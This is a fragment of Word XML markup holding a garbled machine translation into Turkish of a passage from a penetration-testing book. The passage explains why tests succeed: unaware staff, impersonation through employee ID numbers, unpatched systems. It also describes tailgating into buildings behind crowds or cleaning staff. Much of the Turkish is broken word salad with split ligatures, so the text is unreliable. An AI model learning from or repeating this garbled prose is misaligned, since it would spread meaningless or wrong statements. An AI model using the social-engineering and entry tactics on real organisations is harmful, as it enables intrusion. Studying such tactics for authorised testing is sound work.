        <w:t>olmamasından dolayı ortaya çıkmaktadır. Bir şirketin çalışanları ve yüklenicileri özel veya hassas bilgileri</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>uygun prosedürler bilmiyorsanız, onlar çok daha büyük olasılıkla bu bilgilerin korumasız bırakılması için izin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>hassas şirket bilgileri tartışırken üzerinde şirket politikalarının farkında değilseniz, genellikle basitçe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kümesi isteniyor ederek şirketin gelecekteki satış, pazarlama veya araştırma planları hakkında (bazen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>gönüllü olur. tester farkındalık eksikliğini istismar ve politikaları tanınmış olmadığı gerçeği hesaba tes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ğişti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urumda, testin denekler şirketin politikaları ve bilgi işleme prosedürleri ile çok tanıdık gelecektir. genellikle insanlar şirketin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tarafından tanımlanır standartlaştırılmış prosedürler de fi uymayan çünkü Ancak buna rağmen, penetrasyon testleri çalışır.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>günlükleri günlük gözden geçirilmesi gerektiğini söylemek de, çoğu yöneticileri rahatsız etmek çok meşgul. İyi idari v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uygulamaları sistem kon fi yapılanışını kurcalamayı tespit etmek için periyodik olarak kontrol edilmelidir, ancak nadiren de</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>güvenlik politikaları asgari karmaşıklığını ve şifreler için maksimum süre sınırlarını gösterir, ancak birçok site bu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>uygulamak gerekmez. tester bu güvenlik prosedürel süresi geçerse bilir sonra, açığa çıkarmak kolaydır hale ge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perasyonel prosedürleri birbirinden kopuk olması. Bir şirket içinde tek bir kuruluş tarafından kullanılıyo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nellikle con fl başka bir kuruluş tarafından kullanılan süreçlerle ict olabilir. kullanıcıların diğer uygulamalar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kullanılan prosedürleri tamamlamak kimliğini doğrulamak için bir uygulama tarafından kullanılan prosedürleri mı,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>uygulamalar tarafından kullanılıyor farklı standartlar nelerdir? ağda başka bir yerinde daha düşük bir şirketin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">erişim güvenliği var mı? tüm sistem ve hizmetler için eşit gözden fi </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>les ve denetim kayıtlarını açın veya</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>daha yakından takip bazı sistemler kesildin? Tüm bu kurum ve süreçler arasındaki koordinasyon eksikliği</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>örnekler test cihazı tarafından sömürülen ve test hedefine yaklaşmak için kullanı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nellikle onlar nd kendilerini fi hangi durumlara ve koşullara yeterli dikkat yoktur çünkü birçok penetrasyon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Sosyal mühendisliğin hacker'ın sanatı bu gerçeği day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RC Press LLC tarafından</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>o kadar kilitleme veya hassas verileri şifrelemek) ne zaman bilgilerin korunmasına büyük özen insan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rek “Böyle ve böyle Başkan Yardımcısı” bir çağrı geldiğinde aniden sıkı kullanıcı kimlik doğrulama ve</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kontrol prosedürleri takip çalışanlar onlar hakkında tüm “unutmak” “derhal.” “Başkan” Does kendis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orunları olan teknik destek hattı mı? Muhtemelen hayır, ama insanlar açıkça belirtildiği verilere erişmek için</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>için kişi soran bile hassas bilgilere erişim taleplerini meydan yok, bilgi ihtiyacını sorgulamıyorum,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kimliğini kanıtlamak için bir çalışanı sağlayan için tek bir kaynak itimat ve genellikle o kaynak yerleşik bir koruması</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>şirket kendi ortakları için çalışan tanımladı fi katyon (ID) numaraları atamak. Bu rakam şirketin serbestçe istendiğinde</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>henüz işçi rozetleri üzerinde açıkça gösterilir ve birçok hizmetlere erişim sağlar. Başarılı bir test geçerli çalışan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>geçerli bir çalışan kimlik numarasını elde edilmesi veya üretilmesi için bir yöntem belirleye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üyük organizasyonlar sağladığı gizli güveniyor. Bir şirket birkaç yüz çalışanı ötesinde büyür sonra, herkes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sesli tüm çalışanları bilmek için giderek dif fi kült haline gelir. Böylece, şirketin BT ve İK personeli, şifreler, anahtar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>yukarıda belirtilen çalışan kimliği numarası olarak kullanıcı kimlik doğrulaması diğer yöntemlerle, güvenmek</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sistemde, çalışanlar yalnızca kimlik numarası ya da şifre ile anonim varlıkları, tanımladı fi ed olur. Bu daha</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>işçinin kimliği üstlenmek veya bilgileri ifşa insanları kandırmak için sosyal mühendislik kullanımı kolaylaştırır. Tester</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>yapısı içinde gizlemek mümkün olduğunda, keşif korkusu azalır ve test test etmeye devam etmek çok daha iyi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>olac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lerinin başarıyla tamamlanmasının Diğer bir katılımcı en fazla sistem yöneticilerinin kendi sistemlerini güncel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>altındaki sistemler için en son güvenlik yamaları ve fi xES ile tutmuyorum basit bir gerçektir. Kolayca bir sistem yama</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>konfigürasyonundalardır değişikliği veya prosedürel geçişle kaldırılan olabilirdi açıkları - Sistem hırsızlık büyük bir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>güvenlik açıklarından yararlanma sonucu meydana gelir. Sistem operatörleri sistemleri güvenliği</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>konfigürasyonundalardır gerisinde izin vermeye devam gerçeği test sürekli sistemlerini nüfuz etmede başarılı olacağı anlamına ge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için uygun araçlar daha sofistike ve daha geniş bir alana dağıtılmış hale gelmektedir. Bu sistem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>istismar ve aracın nasıl herhangi bir teknik altyapıya gerek duymadan bunları uygulamak için son derece gelişmiş</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bile acemi korsanı izin verdi. Genellikle bu araçlar bir anda bir sistemde güvenlik açıkları yüzlerce</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Yeni delikler bulundukça, hacker araçları hayat daha da sefil ayak uydurmak zorundadır kötü yönetici için</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>serbest bırakabilirsiniz hızlı yazılım şirketleri daha onları istismar. Sonunda, yönetici şey özleyeceğim ve bu şey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sisteme girmeye kullanabilirsiniz bir delikt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Saldırı Strateji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 biraz farklı görevi yaklaşacaktır gerçekleştiren her güvenlik çalışanı ve test tarafından kullanılan gerçek</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>etkileşime kadarki değişecektir. Ancak, çoğu test durumları karşısında ortak olduğu söylenebilir birkaç temel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>saldırının tek yöntemle güvenmeyin. Farklı durumlar farklı saldırılar için diyoruz. tester bir yerde fiziksel güvenliğini</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ise, test binada almanın bir yöntemi deneyebilirsiniz; örneğin insanların sabah inrush sırasında kalabalığın</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>yürürken. Bu işe yaramazsa, bir yan kapıya temizlik insanları aşağıdakileri deneyin. Bu işe yaramazsa, başka bir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Aynı yöntem elektronik saldırılar için de geçerlidir. bir saldırı çalışmıyor (veya sistem o saldırı duyarlı değildir),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
